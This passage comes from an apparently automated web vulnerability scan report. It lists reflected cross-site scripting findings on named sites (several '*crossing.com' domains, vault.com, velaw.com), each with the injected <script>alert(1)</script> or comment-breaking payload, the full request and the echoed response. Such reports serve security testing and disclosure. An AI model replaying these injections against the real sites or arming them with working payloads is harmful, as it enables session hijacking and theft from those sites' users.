Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102528

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.trainingcrossing.com/?77df3"><script>alert(1)</script>601a884eba3=1">
...[SNIP]...

3.129. http://www.transportationcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.transportationcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7388e"><script>alert(1)</script>3273979c9e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7388e"><script>alert(1)</script>3273979c9e3=1 HTTP/1.1
Host: www.transportationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:31 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=uu4j24vvnhit3de5jjak5ajl20; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:31 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 126907

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.transportationcrossing.com/?7388e"><script>alert(1)</script>3273979c9e3=1">
...[SNIP]...

3.130. http://www.travelingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.travelingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29013"><script>alert(1)</script>55f735e164d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?29013"><script>alert(1)</script>55f735e164d=1 HTTP/1.1
Host: www.travelingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:28 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=98i3ogstggait0rcvm6cac2nu5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111563

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.travelingcrossing.com/?29013"><script>alert(1)</script>55f735e164d=1">
...[SNIP]...

3.131. http://www.truckingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truckingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f69c"><script>alert(1)</script>940d23ae3a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2f69c"><script>alert(1)</script>940d23ae3a1=1 HTTP/1.1
Host: www.truckingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=reqvomlshroa4lg39ro64hkq76; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109198

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.truckingcrossing.com/?2f69c"><script>alert(1)</script>940d23ae3a1=1">
...[SNIP]...

3.132. http://www.tvcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tvcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee91a"><script>alert(1)</script>257bf57adca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ee91a"><script>alert(1)</script>257bf57adca=1 HTTP/1.1
Host: www.tvcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:12 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=seap0ed91uj33tvl8163cvrqq1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:12 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101362

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.tvcrossing.com/?ee91a"><script>alert(1)</script>257bf57adca=1">
...[SNIP]...

3.133. http://www.underwritingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.underwritingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10cd2"><script>alert(1)</script>eddf6cfe54a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?10cd2"><script>alert(1)</script>eddf6cfe54a=1 HTTP/1.1
Host: www.underwritingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ug7iikt1hilvoorm6cbc5913m2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:57 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103021

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.underwritingcrossing.com/?10cd2"><script>alert(1)</script>eddf6cfe54a=1">
...[SNIP]...

3.134. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vault.com
Path:	/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f2df'%3balert(1)//8ecbb1f6508 was submitted in the REST URL parameter 4. This input was echoed as 9f2df';alert(1)//8ecbb1f6508 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /wps/portal/usa/9f2df'%3balert(1)//8ecbb1f6508/company-profile/Vinson-&-Elkins-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 18:46:35 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIBNjI30v_aj0nPwkkEon_XCQdmTlQY4uBp7OXuZBwf5exgYWBhB5AxzA0UDfzyM_N1W_IDvJIMvEUREAyuriAQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIBNjI30v_aj0nPwkkEon_XCQdmTlQY4uBp7OXuZBwf5exgYWBhB5AxzA0UDfzyM_N1W_IDvJIMvEUREAyuriAQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000M6HzNwpPLpJtCoH-PvGbXWY:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=10
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:38 GMT;path=/
Content-Length: 71712

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
alse , hideGigyaLink:true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/9f2df';alert(1)//8ecbb1f6508'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google,messenger'
...[SNIP]...

3.135. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [companyId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vault.com
Path:	/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The value of the companyId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97fb2"><script>alert(1)</script>3bad20cc3eb was submitted in the companyId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=42197fb2"><script>alert(1)</script>3bad20cc3eb HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:24 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000G1_JrXVYveRAbSxDcQP-B9h:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=70
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:28 GMT;path=/
Content-Length: 58296

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="#" onclick="toggleDisplayId('save');_gaq.push(['_trackEvent', 'vault.com tools', 'save', 'http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=42197fb2"><script>alert(1)</script>3bad20cc3eb']);">
...[SNIP]...

3.136. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vault.com
Path:	/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5616"><script>alert(1)</script>41dece5dd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?d5616"><script>alert(1)</script>41dece5dd80=1 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:17 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000sVZxJy0CmQsFdXIQLzrOsAU:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=41
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:20 GMT;path=/
Content-Length: 67435

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="#" onclick="toggleDisplayId('save');_gaq.push(['_trackEvent', 'vault.com tools', 'save', 'http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?d5616"><script>alert(1)</script>41dece5dd80=1']);">
...[SNIP]...

3.137. http://www.velaw.com/offices/offices.aspx [ctl00%24txtboxSearch parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.velaw.com
Path:	/offices/offices.aspx

Issue detail

The value of the ctl00%24txtboxSearch request parameter is copied into an HTML comment. The payload 405fd-->db11da91753 was submitted in the ctl00%24txtboxSearch parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /offices/offices.aspx HTTP/1.1
Host: www.velaw.com
Proxy-Connection: keep-alive
Referer: http://www.velaw.com/offices/offices.aspx
Cache-Control: max-age=0
Origin: http://www.velaw.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45
Content-Length: 6790

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUIOTYxNDU2ODYPZBYCZg9kFgICAxBkZBYCAgEPZBYCAgEPZBYCAgMPZBYCAgcPZBYGAgEPDxYCHgRUZXh0BQdPZmZpY2VzZGQCAw8PFgIeBVRpdGxlBQEgZGQCBQ8PFgIfAAXyIjxUQUJMRSBib3
...[SNIP]...
%2BG1taFSSMCpm066tP5g%3D&__EVENTVALIDATION=%2FwEWDALagtuGBgKejOLuAgLs5fqeCgLz5fqeCgLy5fqeCgLx5fqeCgLw5fqeCgL35fqeCgL25fqeCgL15fqeCgKx3o%2BTDAKns8rnDiPy1LpQsocHPUGsrbmuTCDxeOCY&ctl00%24txtboxSearch=%27405fd-->db11da91753&ctl00%24ddl_Search=0&ctl00%24btnGo=Go&ctl00%24ContentPlaceHolder_Body%24ListSummaryOffice%24ctl00%24ContentPlaceHolder_Body%24ListSummaryOfficeEktronClientManager=EktronJS%2CEktronThickBoxJS%2CEktron
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:33:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Vinson &
...[SNIP]...
<input name="ctl00$ContentPlaceHolder_Body$txtboxSearch" type="text" value="'405fd-->db11da91753" id="ctl00_ContentPlaceHolder_Body_txtboxSearch" class="SiteSearch" style="width:130px;left: 199px" />
...[SNIP]...

3.138. http://www.velaw.com/search/search_result.aspx [searchtext parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.velaw.com
Path:	/search/search_result.aspx

Issue detail

The value of the searchtext request parameter is copied into an HTML comment. The payload 892c0-->b7aa13ac6c3 was submitted in the searchtext parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search/search_result.aspx?searchtext='892c0-->b7aa13ac6c3&section=0 HTTP/1.1
Host: www.velaw.com
Proxy-Connection: keep-alive
Referer: http://www.velaw.com/offices/offices.aspx
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:34:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Vinson &
...[SNIP]...
<input name="ctl00$ContentPlaceHolder_Body$txtboxSearch" type="text" value="'892c0-->b7aa13ac6c3" id="ctl00_ContentPlaceHolder_Body_txtboxSearch" class="SiteSearch" style="width:130px;left: 199px" />
...[SNIP]...

3.139. http://www.velaw.com/workarea/csslib/ektronCss.ashx [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.velaw.com
Path:	/workarea/csslib/ektronCss.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 41425<script>alert(1)</script>0ea1ee155f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/csslib/ektronCss.ashx?id=EktronThickBoxCss+EktronBubbleCss+EktronModalCss41425<script>alert(1)</script>0ea1ee155f HTTP/1.1
Host: www.velaw.com
Proxy-Connection: keep-alive
Referer: http://www.velaw.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:32:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=31536000
Expires: Sat, 21 Jan 2012 18:32:25 GMT
Last-Modified: Fri, 21 Jan 2011 18:32:25 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 6917

#Ekt_AjaxContent{padding:0;margin:0;}#EkTB_secondLine{font:10px Arial,Helvetica,sans-serif;color:#666;}#EkTB_window a:link{color:#666;}#EkTB_window a:visited{color:#666;}#EkTB_window a:hover{color:#00
...[SNIP]...
l('/WorkArea/images/application/bubble/bott.gif');}

/* ############################################################# */
/* ektron registered stylesheet: css file not found */
/* id: EktronModalCss41425<script>alert(1)</script>0ea1ee155f */
/* path:
/* ############################################################# */

